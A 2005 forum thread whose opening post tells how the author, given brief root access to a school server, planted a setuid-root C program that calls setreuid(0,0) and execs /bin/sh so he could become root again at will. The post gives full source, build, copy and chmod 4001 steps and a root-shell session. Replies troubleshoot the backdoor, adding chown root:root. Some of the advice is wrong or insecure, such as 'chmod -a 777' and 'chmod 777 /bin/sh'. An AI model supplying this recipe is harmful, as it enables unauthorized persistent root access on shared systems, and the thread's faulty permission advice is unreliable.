Forums: Making A Dangerous File For Linux Systems. - Forums

Making A Dangerous File For Linux Systems. Abusing S permission with a simple C program.

#1 MAGMAG

Posted 28 October 2005 - 09:34 AM

hi :)

When I was learning Linux in our ins, our teacher gave us root access for only 5 minutes so we could get familiar with Webmin.

Then what did I do?

:D Instead of using Webmin, I made a telnet session with our server and became root. Then I made a simple file, and after that, each time I wanted to become root I just executed that simple program.


What was the program?

Well, as you know, a file with the S permission can get root access whenever it wants to. It means that if our program somehow tells the OS to give us root access, it will.

How to get root access in our program?

Well, as you know (or don't :D), there is a syscall named setreuid. This syscall requests the system to change the program's privilege.
Using this syscall, our S-permission program can get root access, and after that any command we run in our program is executed as root.

Reading the manual pages of this function and of the function execve can give us good knowledge.
man 2 setreuid
man 2 execve

So the complete source of our program will be something like this:

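#include <stdlib.h>   /* exit */
#include <unistd.h>   /* setreuid, execve */

int main()
{
    char *path[2];

    path[0] = "/bin/sh";       /* program to run, also passed as argv[0] */
    path[1] = 0;               /* argv must end with a NULL pointer */
    setreuid(0, 0);            /* setreuid takes two arguments: real and effective UID */
    execve(path[0], path, 0);  /* replace this process with the shell */
    exit(0);                   /* reached only if execve fails */
}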

compiling this code with gcc:
gcc -o shell ./shell.c
copying our executable file to our home directory:
cp ./shell /home/mohammad
and then giving the S permission to our file (and the execution permission for everyone).
chmod 4001 /home/mohammad/shell

Pay attention to copy the executable file before giving it the S permission, because the S permission will be cancelled during the copy.

and now we have an executable file that each time we run it, we'll get a root shell :D

[mohammad@localhost mohammad]$ whoami
mohammad
[mohammad@localhost mohammad]$ ./shell
sh-2.05b# whoami
root
sh-2.05b# exit
exit
[mohammad@localhost mohammad]$

We used /bin/sh because using it in the function is simpler than bash or csh or ...

bye for now ;)
0

#2 toe

Posted 30 October 2005 - 01:25 AM

Sometimes the simplest thing works the best. Very useful.

-toe
0

#3 contrabanda

Posted 31 October 2005 - 12:14 AM

Well,
I did all the steps as you described here,
but when I try to execute this program I get an error:

[contrabanda@GRT contrabanda]$ ./shell
-bash: ./shell: Permission denied
[contrabanda@GRT contrabanda]$

Can you explain why I get such an error?
0

#4 belgther

Posted 31 October 2005 - 01:13 AM

contrabanda, on Oct 31 2005, 09:14 AM, said:

Well,
I did all the steps as you described here,
but when I try to execute this program I get an error:

[contrabanda@GRT contrabanda]$ ./shell
-bash: ./shell: Permission denied
[contrabanda@GRT contrabanda]$

Can you explain why I get such an error?


Type chmod -a 777 ./shell and try again. With that, you set the permissions.
"The wisest one is the one who knows himself/herself." Quote of the life
belgther... aka... belgther
0

#5 contrabanda

Posted 31 October 2005 - 01:27 AM

Quote

Type chmod -a 777 ./shell and try again. With that, you set the permissions.


I made this command:

chmod 4001 /home/contrabanda/shell
0

#6 Pro21

Posted 31 October 2005 - 04:42 AM

belgther, on Oct 31 2005, 10:13 AM, said:

Type chmod -a 777 ./shell and try again. With that, you set the permissions.


-a takes away permissions; it will not work.

chmod s+x ./shell maybe it's better, I don't test it

s user or group set-ID
x execute permission

Already, why compile with the ./shell name?? Useless.
It's better to give a normal name like shell and to execute it type ./shell ...
So if I've the time I will test this piece of code :)

But what does chmod 4001 represent? I always used 0*** but never 4***
So if someone has a response, thx
0

#7 MAGMAG

Posted 31 October 2005 - 06:59 AM

hi :)

If you are running this on your own machine and you get this error, it might be because you don't have the permission to execute /bin/sh.
Do this:
chmod 777 /bin/sh
or use another shell except "sh". But in that case you may have to pass some environment variables to your shell, and it'll become more complicated.

I don't have an exact idea why you get that error. Normally everyone has the permission to run /bin/sh.

Or maybe some restrictions more than usual (using PAM, *deny* in /etc, /etc/security, ...).

If you find out why you get this error, please tell us. ;)

And about changing the permission:
I don't think it makes much difference which way you change the permission. What I did was give the least sufficient permission to our file (only the S permission and execution permission for anyone).
4000 stands for the S permission and 1 is execution permission for everyone (other).

bye for now ;)
0
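
How mode 4001 is evaluated at exec time, as an added example that is not part of any post in this thread: the kernel consults exactly one permission class (owner first), and the set-UID bit makes the process take the file owner's UID. The uid 1000 and the function names are assumptions made for the illustration.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Permission bits of the single class the kernel consults for this caller.
   First match wins: owner, then group, then other. Supplementary groups and
   the uid-0 override are not modelled. */
static unsigned class_bits(mode_t mode, uid_t f_uid, gid_t f_gid,
                           uid_t uid, gid_t gid)
{
    if (uid == f_uid) return (mode >> 6) & 7;  /* owner bits, even if "other" grants more */
    if (gid == f_gid) return (mode >> 3) & 7;  /* group bits */
    return mode & 7;                           /* other bits */
}

/* 1 if an unprivileged caller (uid, gid) may execute the file. */
int may_exec(mode_t mode, uid_t f_uid, gid_t f_gid, uid_t uid, gid_t gid)
{
    return (class_bits(mode, f_uid, f_gid, uid, gid) & 1) != 0;
}

/* Effective UID after a successful exec: the file owner's when set-UID is
   set, otherwise the caller's. Assumes the filesystem is not mounted nosuid. */
uid_t euid_after_exec(mode_t mode, uid_t f_uid, uid_t uid)
{
    return (mode & S_ISUID) ? f_uid : uid;
}

int main(void)
{
    const mode_t mode = 04001;           /* the thread's chmod 4001 */
    const uid_t user = 1000;             /* constructed unprivileged uid and gid */
    const uid_t owners[] = { 1000, 0 };  /* file owned by that user, then by root */
    size_t i;

    for (i = 0; i < sizeof owners / sizeof owners[0]; i++) {
        uid_t o = owners[i];
        if (!may_exec(mode, o, (gid_t)o, user, (gid_t)user))
            printf("file owner uid=%lu: Permission denied (owner class has no x bit)\n",
                   (unsigned long)o);
        else
            printf("file owner uid=%lu: runs with euid=%lu\n", (unsigned long)o,
                   (unsigned long)euid_after_exec(mode, o, user));
    }
    return 0;
}
```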

#8 roto

Posted 03 December 2005 - 08:18 AM

I had to chown root:root the bin then chmod 4001 the file for this to work. I bet you guys made the same mistake, making the file as a normal user :)

roto@hollywood ~/code/linux $ gcc regetroot.c -o reget
roto@hollywood ~/code/linux $ su
Password:
hollywood linux # chown root:root reget
hollywood linux # chmod 4001 reget
hollywood linux # exit
exit
roto@hollywood ~/code/linux $ ./reget
sh-3.00# whoami
root
sh-3.00#
0
